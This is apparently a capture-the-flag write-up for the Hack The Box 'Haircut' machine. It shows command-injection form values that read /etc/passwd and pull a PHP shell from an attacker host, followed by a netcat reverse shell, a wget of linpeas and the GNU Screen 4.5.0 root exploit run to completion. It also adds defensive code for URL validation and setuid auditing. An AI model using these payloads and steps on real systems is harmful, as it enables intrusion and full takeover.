Haircut

Introduction:
Haircut is a very simple but great machine. It runs a vulnerable web app that passes user input to curl, which lets you download a shell onto the web server and get an initial foothold.
Recon
NMAP scan
nmap -sS -sV -sC -T4 -Pn -O -oN nmap.haircut.txt 10.10.10.24
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 20:39 EST
Nmap scan report for haircut.htb (10.10.10.24)
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.12 seconds

Scan all ports
Enter your target IP address or URL here: 10.10.10.24
------------------------------------------------------------
Scanning target 10.10.10.24
Time started: 2021-01-04 20:39:22.511833
------------------------------------------------------------
Port 80 is open
Port 22 is open
Port scan completed in 0:00:06.438605

Enumeration
Let's do the directory enumeration for the web server:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.24
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.24
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/04 20:41:52 Starting gobuster
===============================================================
/uploads (Status: 301)
===============================================================
2021/01/04 20:47:20 Finished
===============================================================
root@kinetic:.../hackthebox/haircut/data#

The uploads directory seems to be a juicy target! Let's check if we can scan for additional file extensions. This time I fired up DirBuster, as I really like its tree view for recursive searches.

There you have it: we have a PHP page!
Exploitation

Let's have some fun with this form:

file:///127.0.0.1/../../../etc/passwd
file:///127.0.0.1/../../../var/www/html/test.html
Now, let's see if we can download a shell and access it:
http://10.10.14.38:8000/shell.php>/var/www/html/shell.php » This did not work; it looks like I don't have write permissions there, or maybe the file was written to a different directory.
http://10.10.14.38:8000/shell.php>/var/www/html/uploads/shell.php » This worked!
root@kinetic:…/hackthebox/haircut/data# nc -lvnp 4455
listening on [any] 4455 …
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.24] 53492
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 04:01:49 up 1:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ $ $ $ $
$ which python
$ ls -l /usr/bin/ | grep python
lrwxrwxrwx 1 root root 26 May 15 2017 dh_pypy -> ../share/dh-python/dh_pypy
lrwxrwxrwx 1 root root 29 May 15 2017 dh_python3 -> ../share/dh-python/dh_python3
lrwxrwxrwx 1 root root 23 May 15 2017 pdb3.5 -> ../lib/python3.5/pdb.py
lrwxrwxrwx 1 root root 31 May 15 2017 py3versions -> ../share/python3/py3versions.py
lrwxrwxrwx 1 root root 26 May 15 2017 pybuild -> ../share/dh-python/pybuild
lrwxrwxrwx 1 root root 9 May 15 2017 python3 -> python3.5
-rwxr-xr-x 2 root root 4460336 Nov 17 2016 python3.5
-rwxr-xr-x 2 root root 4460336 Nov 17 2016 python3.5m
lrwxrwxrwx 1 root root 10 May 15 2017 python3m -> python3.5m
$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@haircut:/$
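The two form values used above show one root cause: the field evidently reaches curl through a shell, so a file:// URL reads local files and a '>' redirects the download into the web root. As an added example (not the machine's code; the function names are mine), this is how such a fetch should be wrapped: allow-list the parsed URL and run curl with an argv list so no shell is involved, with the output path chosen by the server, outside the web root.

```python
import re
import subprocess
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Only RFC 3986 URL characters are accepted. Shell redirection and control
# characters ('>', '<', '|', '`', space, newline) are not in this set.
URL_CHARS = re.compile(r"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]+$")

class RejectedUrl(ValueError):
    """Raised when the form value must not be handed to curl."""

def validate_fetch_url(user_input: str) -> str:
    """Return the URL unchanged if it is an http(s) URL with a host; else raise."""
    if not user_input or len(user_input) > 2048 or not URL_CHARS.match(user_input):
        raise RejectedUrl("disallowed characters or length")
    parts = urlsplit(user_input)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise RejectedUrl(f"scheme {parts.scheme!r} not allowed")  # stops file://
    if not parts.hostname:
        raise RejectedUrl("missing host")
    return user_input

def is_allowed(user_input: str) -> bool:
    try:
        validate_fetch_url(user_input)
        return True
    except RejectedUrl:
        return False

def build_curl_argv(user_input: str, out_path: str) -> list:
    """argv for curl: the URL is a single argument, the output file is fixed by
    the server, and no shell ever parses the string."""
    url = validate_fetch_url(user_input)
    return ["curl", "--silent", "--show-error", "--max-time", "10",
            "--proto", "=http,https", "--proto-redir", "=http,https",
            "--max-filesize", "1048576", "--output", out_path, url]

def fetch(user_input: str, out_path: str) -> int:
    """Run curl without a shell (argv list, shell=False); returns curl's exit code."""
    return subprocess.run(build_curl_argv(user_input, out_path), shell=False).returncode

if __name__ == "__main__":
    # The form values from the writeup above, plus an ordinary URL.
    for value in ("file:///127.0.0.1/../../../etc/passwd",
                  "http://10.10.14.38:8000/shell.php>/var/www/html/uploads/shell.php",
                  "http://10.10.14.38:8000/shell.php",
                  "https://example.com/image.png"):
        print("allowed " if is_allowed(value) else "rejected", value)
```

A plain http(s) URL still passes, as the feature requires; what changes is that the download can no longer be steered into a path of the attacker's choosing or used to read local files.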
Post-exploit/PrivEsc
Download linpeas and run it.
www-data@haircut:/tmp$ wget http://10.10.14.38:8000/linpeas.sh
wget http://10.10.14.38:8000/linpeas.sh
--2021-01-05 04:04:06-- http://10.10.14.38:8000/linpeas.sh
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 313316 (306K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh 100%[===================>] 305.97K --.-KB/s in 0.08s

2021-01-05 04:04:06 (3.88 MB/s) - 'linpeas.sh' saved [313316/313316]

www-data@haircut:/tmp$ chmod 755 linpeas.sh
chmod 755 linpeas.sh
www-data@haircut:/tmp$ ./linpeas.sh
LINPEAS
====================================( Basic information )=====================================
OS: Linux version 4.4.0-78-generic (buildd@lgw01-11) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: haircut
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)


[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(maria) gid=1000(maria) groups=1000(maria),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)


-rwsr-xr-x 1 root root 1.6M May 19 2017 /usr/bin/screen-4.5.0
 --- It looks like /usr/bin/screen-4.5.0 is executing from and you can impersonate it (strings line: from wiH)
 --- It looks like /usr/bin/screen-4.5.0 is executing /dev and you can impersonate it (strings line: /dev)
 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/ and you can impersonate it (strings line: /dev/)
 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/console and you can impersonate it (strings line: /dev/console)
 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/null and you can impersonate it (strings line: /dev/null)
 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/ptmx and you can impersonate it (strings line: /dev/ptmx)
 --- It looks like /usr/bin/screen-4.5.0 is executing /dev/tty and you can impersonate it (strings line: /dev/tty)
 --- It looks like /usr/bin/screen-4.5.0 is executing /tmp/screens and you can impersonate it (strings line: /tmp/screens)
 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include and you can impersonate it (strings line: /usr/include)
 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include/netinet and you can impersonate it (strings line: /usr/include/netinet)
 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include/x86_64-linux-gnu/bits and you can impersonate it (strings line: /usr/include/x86_64-linux-gnu/bits)
 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/include/x86_64-linux-gnu/sys and you can impersonate it (strings line: /usr/include/x86_64-linux-gnu/sys)
 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/lib/gcc/x86_64-linux-gnu/5/include and you can impersonate it (strings line: /usr/lib/gcc/x86_64-linux-gnu/5/include)
 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/local/bin/screen and you can impersonate it (strings line: /usr/local/bin/screen)
 --- It looks like /usr/bin/screen-4.5.0 is executing /usr/share/screen/utf8encodings and you can impersonate it (strings line: /usr/share/screen/utf8encodings)
 --- It looks like /usr/bin/screen-4.5.0 is executing chacl and you can impersonate it (strings line: chacl)
 --- It looks like /usr/bin/screen-4.5.0 is executing chmod and you can impersonate it (strings line: chmod)


[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root mlocate 39K Nov 18 2014 /usr/bin/mlocate
-rwsr-sr-x 1 daemon daemon 51K Jan 14 2016 /usr/bin/at
-rwxr-sr-x 1 root utmp 425K Feb 7 2016 /usr/bin/screen.old
 --- It looks like /usr/bin/screen.old is executing from and you can impersonate it (strings line: from wiH)
 --- It looks like /usr/bin/screen.old is executing /dev/ and you can impersonate it (strings line: /dev/)
 --- It looks like /usr/bin/screen.old is executing /dev/console and you can impersonate it (strings line: /dev/console)
 --- It looks like /usr/bin/screen.old is executing /dev/null and you can impersonate it (strings line: /dev/null)
 --- It looks like /usr/bin/screen.old is executing /dev/tty and you can impersonate it (strings line: /dev/tty)
 --- It looks like /usr/bin/screen.old is executing /usr/share/screen/utf8encodings and you can impersonate it (strings line: /usr/share/screen/utf8encodings)
 --- It looks like /usr/bin/screen.old is executing /var/run/screen and you can impersonate it (strings line: /var/run/screen)
 --- It looks like /usr/bin/screen.old is executing chacl and you can impersonate it (strings line: chacl)
 --- It looks like /usr/bin/screen.old is executing chmod and you can impersonate it (strings line: chmod)
 --- It looks like /usr/bin/screen.old is executing chmod and you can impersonate it (strings line: chmod )
 --- It looks like /usr/bin/screen.old is executing chmod and you can impersonate it (strings line: chmod tty)
 --- It looks like /usr/bin/screen.old is executing chown and you can impersonate it (strings line: chown)
 --- It looks like /usr/bin/screen.old is executing chown and you can impersonate it (strings line: chown tty)
 --- It looks like /usr/bin/screen.old is executing clear and you can impersonate it (strings line: clear)
 --- It looks like /usr/bin/screen.old is executing mkdir and you can impersonate it (strings line: mkdir)
 --- It looks like /usr/bin/screen.old is executing mkfifo and you can impersonate it (strings line: mkfifo)
 --- It looks like /usr/bin/screen.old is executing mkfifo and you can impersonate it (strings line: mkfifo failed)
 --- It looks like /usr/bin/screen.old is executing realpath and you can impersonate it (strings line: realpath)
 --- It looks like /usr/bin/screen.old is executing rename and you can impersonate it (strings line: rename)
 --- It looks like /usr/bin/screen.old is executing reset and you can impersonate it (strings line: reset)
 --- It looks like /usr/bin/screen.old is executing screen and you can impersonate it (strings line: screen )
 --- It looks like /usr/bin/screen.old is executing setsid and you can impersonate it (strings line: setsid)
 --- It looks like /usr/bin/screen.old is executing sleep and you can impersonate it (strings line: sleep)
 --- It looks like /usr/bin/screen.old is executing sort and you can impersonate it (strings line: sort)
 --- It looks like /usr/bin/screen.old is executing stat and you can impersonate it (strings line: stat )
 --- It looks like /usr/bin/screen.old is executing unlink and you can impersonate it (strings line: unlink)
 --- It looks like /usr/bin/screen.old is executing wall and you can impersonate it (strings line: wall)
 --- Trying to execute /usr/bin/screen.old with strace in order to look for hijackable libraries...



[+] Searching root files in home dirs (limit 30)
/home/
/home/maria/Desktop/user.txt
/root/
So, we have a setuid-root screen binary (/usr/bin/screen-4.5.0); let's see if we can exploit that:
(py3) eneloop@kinetic:.../hackthebox/haircut/data$ searchsploit screen 4.5
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
(py3) eneloop@kinetic:.../hackthebox/haircut/data$
Yay! Juicy.
Copy the file over. The first copy has ^M (CRLF) line endings and fails with "bad interpreter", and dos2unix is not installed on the target, so I ran dos2unix locally and transferred it again:
(py3) eneloop@kinetic:.../hackthebox/haircut/data$ dos2unix 41154.sh
dos2unix: converting file 41154.sh to Unix format...
(py3) eneloop@kinetic:.../hackthebox/haircut/data$ vi 41154.sh
(py3) eneloop@kinetic:.../hackthebox/haircut/data$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.24 - - [04/Jan/2021 22:13:32] "GET /41154.sh HTTP/1.1" 200 -

www-data@haircut:/tmp$ chmod 755 41154.sh
chmod 755 41154.sh
www-data@haircut:/tmp$ ./41154.sh
./41154.sh
bash: ./41154.sh: /bin/bash^M: bad interpreter: No such file or directory
www-data@haircut:/tmp$ dos2unix
dos2unix
The program 'dos2unix' is currently not installed. To run 'dos2unix' please ask your administrator to install the package 'dos2unix'
www-data@haircut:/tmp$ wget http://10.10.14.38:8000/41154.sh
wget http://10.10.14.38:8000/41154.sh
--2021-01-05 04:21:44-- http://10.10.14.38:8000/41154.sh
Connecting to 10.10.14.38:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1151 (1.1K) [text/x-sh]
Saving to: '41154.sh.1'

41154.sh.1 100%[===================>] 1.12K --.-KB/s in 0.004s

2021-01-05 04:21:44 (272 KB/s) - '41154.sh.1' saved [1151/1151]

www-data@haircut:/tmp$ ls -otr
ls -otr
total 384
-rwxr-xr-x 1 www-data 313316 Jan 4 01:25 linpeas.sh
drwx------ 3 root 4096 Jan 5 02:38 systemd-private-445a0ec61391415db8e3691ba4ef2858-systemd-timesyncd.service-TBudxB
drwx------ 2 root 4096 Jan 5 02:39 vmware-root
-rw-r--r-- 1 www-data 540 Jan 5 03:31 test.txt
-rw-r--r-- 1 www-data 3777 Jan 5 03:52 shell.php
-rw-rw-rw- 1 www-data 16554 Jan 5 03:58 41458.c
drwxr-xr-x 3 root 4096 Jan 5 04:05 screens
drwx------ 2 www-data 4096 Jan 5 04:05 tmux-33
-rwxr-xr-x 1 www-data 1192 Jan 5 04:11 41154.sh
-rw-rw-rw- 1 www-data 1151 Jan 5 04:13 41154.sh.1
-rwxrwxrwx 1 www-data 24024 Jan 5 04:15 pwn
www-data@haircut:/tmp$ rm 41154.sh; mv 41154.sh.1 41154.sh
rm 41154.sh; mv 41154.sh.1 41154.sh
www-data@haircut:/tmp$ chmod 755 41154.sh
chmod 755 41154.sh
Now, just run the exploit and get the privesc for an easy win!
www-data@haircut:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
 chmod("/tmp/rootshell", 04755);
 ^
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
 setuid(0);
 ^
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
 setgid(0);
 ^
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
 seteuid(0);
 ^
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
 setegid(0);
 ^
/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
 execvp("/bin/sh", NULL, NULL);
 ^
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# whoami
whoami
root
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
4cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX51
#
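For the defensive side of the screen privesc above, an added example (not from the writeup; the function names and the baseline list are mine): it reports setuid-root binaries under the usual bin directories that are not in a baseline, which on this box flags /usr/bin/screen-4.5.0, and it reports the /etc/ld.so.preload file the exploit creates. A constructed directory tree stands in for the host so the check runs offline as an unprivileged user.

```python
import os
import stat
import tempfile

BIN_DIRS = ("bin", "sbin", "usr/bin", "usr/sbin", "usr/local/bin")
# Setuid programs normally present on Ubuntu 16.04 (partial); anything else
# found under BIN_DIRS is reported. Extend from a known-good image of the host.
BASELINE = {"su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
            "mount", "umount", "ping", "ping6", "pkexec", "fusermount"}

def setuid_files(root="/", owner=0):
    """Regular files under BIN_DIRS with the setuid bit, owned by `owner` (root by default)."""
    found = []
    for d in BIN_DIRS:
        base = os.path.join(root, d)
        if not os.path.isdir(base):
            continue
        for name in os.listdir(base):
            path = os.path.join(base, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == owner:
                found.append(path)
    return sorted(found)

def unexpected_setuid(root="/", owner=0):
    return [p for p in setuid_files(root, owner) if os.path.basename(p) not in BASELINE]

def preload_entries(root="/"):
    """ld.so.preload should not exist on a normal host; return its entries, or None."""
    path = os.path.join(root, "etc/ld.so.preload")
    if not os.path.isfile(path):
        return None
    with open(path, errors="replace") as fh:
        return [ln.strip() for ln in fh if ln.strip()]

def build_sample_tree(root):
    """Constructed fixture mirroring the post-exploit state shown above."""
    os.makedirs(os.path.join(root, "usr/bin"))
    os.makedirs(os.path.join(root, "etc"))
    for name, mode in (("sudo", 0o4755), ("screen-4.5.0", 0o4755), ("ls", 0o755)):
        path = os.path.join(root, "usr/bin", name)
        open(path, "w").close()
        os.chmod(path, mode)
    with open(os.path.join(root, "etc/ld.so.preload"), "w") as fh:
        fh.write("/tmp/libhax.so\n")  # constructed entry, not copied from the target

def demo():
    """Audit the fixture as the current user: returns (unexpected names, preload entries)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        names = [os.path.basename(p) for p in unexpected_setuid(root, os.getuid())]
        return names, preload_entries(root)
```

On a live host, `unexpected_setuid()` and `preload_entries()` with their defaults audit `/` for setuid-root binaries and the preload file; run as root for a complete listing, or point `root` at a mounted disk image.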